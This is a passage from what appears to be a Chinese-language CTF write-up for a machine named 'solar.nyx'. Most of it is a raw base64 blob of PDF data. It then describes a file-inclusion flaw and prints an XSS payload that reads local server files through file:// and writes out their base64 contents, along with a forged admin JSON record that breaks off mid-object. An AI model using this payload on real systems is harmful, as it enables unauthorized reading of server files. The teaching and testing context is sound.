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YVZ1U2Fucy1Cb2xkCi9DSURTeXN0ZW1JbmZvIDw8IC9SZWdpc3RyeSAoQWRvYmUpIC9PcmRlcmluZyAoSWRlbnRpdHkpIC9TdXBwbGVtZW50IDAgPj4KL0ZvbnREZXNjcmlwdG9yIDIxIDAgUgovQ0lEVG9HSURNYXAgL0lkZW50aXR5Ci9XIFswIFs1OTUgNzE0IDY4MiAzNDAgNjY5IDQ4OSAzNDUgNjc4IDcwNiA2NzMgNzEwIDY0NyA4MjMgNDc0IDY5MCA2OTAgNjkwIDQxMiA2OTAgNjc3IDY5MCAzOTcgNjkwIDM3NyA3MTkgNzY0IDM0MCA1OTAgNzEwIDcxMCA3MDYgNzI4IDEwMzQgODE0IF0KXQo+PgplbmRvYmoKMjQgMCBvYmoKPDwgL0xlbmd0aCA1OTUgPj4Kc3RyZWFtCi9DSURJbml0IC9Qcm9jU2V0IGZpbmRyZXNvdXJjZSBiZWdpbgoxMiBkaWN0IGJlZ2luCmJlZ2luY21hcAovQ0lEU3lzdGVtSW5mbyA8PCAvUmVnaXN0cnkgKEFkb2JlKSAvT3JkZXJpbmcgKFVDUykgL1N1cHBsZW1lbnQgMCA+PiBkZWYKL0NNYXBOYW1lIC9BZG9iZS1JZGVudGl0eS1VQ1MgZGVmCi9DTWFwVHlwZSAyIGRlZgoxIGJlZ2luY29kZXNwYWNlcmFuZ2UKPDAwMDA+IDxGRkZGPgplbmRjb2Rlc3BhY2VyYW5nZQoyIGJlZ2luYmZyYW5nZQo8MDAwMD4gPDAwMDA+IDwwMDAwPgo8MDAwMT4gPDAwMjE+IFs8MDA1Mz4gPDAwNkY+IDwwMDZDPiA8MDA2MT4gPDAwNzI+IDwwMDIwPiA8MDA0NT4gPDAwNkU+IDwwMDY1PiA8MDA2Nz4gPDAwNzk+IDwwMDQ0PiA8MDA3ND4gPDAwMzI+IDwwMDMwPiA8MDAzND4gPDAwMkQ+IDwwMDM5PiA8MDA1ND4gPDAwMzM+IDwwMDNBPiA8MDAzMT4gPDAwMkU+IDwwMDVBPiA8MDA1Mj4gPDAwNjk+IDwwMDczPiA8MDA2ND4gPDAwNjI+IDwwMDc1PiA8MDA0Mz4gPDAwNkQ+IDwwMDQ3PiBdCmVuZGJmcmFuZ2UKZW5kY21hcApDTWFwTmFtZSBjdXJyZW50ZGljdCAvQ01hcCBkZWZpbmVy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ODcgMzg3IDYzMSA2MzEgNjMxIDYzMSAzNTggNjMxIF0KXQo+PgplbmRvYmoKMjkgMCBvYmoKPDwgL0xlbmd0aCA0OTAgPj4Kc3RyZWFtCi9DSURJbml0IC9Qcm9jU2V0IGZpbmRyZXNvdXJjZSBiZWdpbgoxMiBkaWN0IGJlZ2luCmJlZ2luY21hcAovQ0lEU3lzdGVtSW5mbyA8PCAvUmVnaXN0cnkgKEFkb2JlKSAvT3JkZXJpbmcgKFVDUykgL1N1cHBsZW1lbnQgMCA+PiBkZWYKL0NNYXBOYW1lIC9BZG9iZS1JZGVudGl0eS1VQ1MgZGVmCi9DTWFwVHlwZSAyIGRlZgoxIGJlZ2luY29kZXNwYWNlcmFuZ2UKPDAwMDA+IDxGRkZGPgplbmRjb2Rlc3BhY2VyYW5nZQoyIGJlZ2luYmZyYW5nZQo8MDAwMD4gPDAwMDA+IDwwMDAwPgo8MDAwMT4gPDAwMTI+IFs8MDA0QT4gPDAwNzU+IDwwMDZDPiA8MDA2OT4gPDAwNjE+IDwwMDZFPiA8MDA0MT4gPDAwNjQ+IDwwMDZEPiA8MDAyMD4gPDAwMjg+IDwwMDI5PiA8MDAzMj4gPDAwMzE+IDwwMDM1PiA8MDAzNj4gPDAwMkQ+IDwwMDM0PiBdCmVuZGJmcmFuZ2UKZW5kY21hcApDTWFwTmFtZSBjdXJyZW50ZGljdCAvQ01hcCBkZWZpbmVyZXNvdXJjZSBwb3AKZW5kCmVuZAoKZW5kc3RyZWFtCmVuZG9iagoxMSAwIG9iago8PCAvVHlwZSAvRm9udAovU3VidHlwZSAvVHlwZTAKL0Jhc2VGb250IC9EZWphVnVTYW5zCi9FbmNvZGluZyAvSWRlbnRpdHktSAovRGVzY2VuZGFudEZvbnRzIFsyOCAwIFJdCi9Ub1VuaWNvZGUgMjkgMCBSPj4KZW5kb2JqCjIgMCBvYmoKPDwKL1R5cGUgL1BhZ2VzCi9LaWRzIApbCjUgMCBSCl0KL0NvdW50IDEKL1Byb2NTZXQgWy9QREYgL1RleHQgL0ltYWdlQiAvSW1hZ2VDXQo+PgplbmRvYmoKeHJlZgowIDMxCjAwMDAwMDAwMDAgNjU1MzUgZiAKMDAwMDAwMDAwOSAwMDAwMCBuIAowMDAwMDIzODMwIDAwMDAwIG4gCjAwMDAwMDAyMDEgMDAwMDAgbiAKMDAwMDAwMDI5NiAwMDAwMCBuIAowMDAwMDA1OTQ4IDAwMDAwIG4gCjAwMDAwMTY4NDQgMDAwMDAgbiAKMDAwMDAwMDMzMyAwMDAwMCBuIAowMDAwMDAyNzA2IDAwMDAwIG4gCjAwMDAwMDI3MjYgMDAwMDAgbiAKMDAwMDAwNTUwNiAwMDAwMCBuIAowMDAwMDIzNjkzIDAwMDAwIG4gCjAwMDAwMDU1MjcgMDAwMDAgbiAKMDAwMDAwNTU3MSAwMDAwMCBuIAowMDAwMDA1NzgxIDAwMDAwIG4gCjAwMDAwMDU2MTQgMDAwMDAgbiAKMDAwMDAwNTg0NCAwMDAwMCBuIAowMDAwMDA2Mjc4IDAwMDAwIG4gCjAwMDAwMDg1MTEgMDAwMDAgbiAKMDAwMDAwNjA2OSAwMDAwMCBuIAowMDAwMDA2MjU4IDAwMDAwIG4gCjAwMDAwMDg1MzIgMDAwMDAgbiAKMDAwMDAwODc5NyAwMDAwMCBuIAowMDAwMDE1ODQ1IDAwMDAwIG4gCjAwMDAwMTYxOTcgMDAwMDAgbiAKMDAwMDAxNTgyNCAwMDAwMCBuIAowMDAwMDE2OTg1IDAwMDAwIG4gCjAwMDAwMTcyNDUgMDAwMDAgbiAKMDAwMDAyMjg2NSAwMDAwMCBuIAowMDAwMDIzMTUxIDAwMDAwIG4gCjAwMDAwMjI4NDQgMDAwMDAgbiAKdHJhaWxlcgo8PAovU2l6ZSAzMQovSW5mbyAxIDAgUgovUm9vdCAxNiAwIFIKPj4Kc3RhcnR4cmVmCjIzOTI4CiUlRU9GCg==

图片.png

查看相关文档发现文件包含漏洞，尝试构建xss来伪造json数据，可以修改p为其他参数，获取其他路径文件，将这段代码写入到chart中

<script>
p='/var/www/solar.nyx/records/index.php';
x=new XMLHttpRequest;
x.onerror=function() {
  document.write('<p>' + p + ' not found');
};
x.onload=function() {
  document.write('<p>' + p + '</p><div style="word-break: break-all;max-width:90%;">' + btoa(this.responseText) + '</div>');
};
x.open("GET", "file://" + p);
x.send();
</script>

{
"time":"2025-02-20T10:57:01.468Z",
"user":{
	"name":"JulianAdm",
	"role":"admin"},
"solar": 211,
"consumed": 168,
"grid": -43,
